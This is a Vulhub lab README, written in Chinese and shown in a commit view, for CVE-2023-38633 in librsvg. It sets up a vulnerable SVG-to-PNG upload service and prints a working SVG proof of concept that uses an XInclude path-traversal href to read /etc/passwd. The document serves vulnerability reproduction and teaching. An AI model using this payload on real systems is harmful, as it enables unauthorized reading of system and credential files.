first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

View File

@@ -0,0 +1,40 @@
# librsvg XInclude 文件包含漏洞CVE-2023-38633
librsvg是一个用于处理SVG图片的开源依赖库。
librsvg支持XML中的XInclude规范可以用于加载外部内容。在librsvg 2.56.3版本以前由于处理路径存在逻辑错误导致攻击者可以传入一个恶意构造的SVG图片进而读取到任意文件。
参考链接:
- <https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/>
- <https://gitlab.gnome.org/GNOME/librsvg/-/issues/996>
## 漏洞环境
执行如下命令启动一个PHP服务器其中使用librsvg 2.50.7将用户上传的SVG图片转换成PNG图片并返回
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可查看到上传页面。
## 漏洞复现
将路径嵌入到`<xi:include>`标签中如下POC
```xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,255,255);" />
<text x="10" y="100">
<xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
```
上传这个SVG图片即可查看到`/etc/passwd`已被成功读取并渲染进PNG图片中
![](1.png)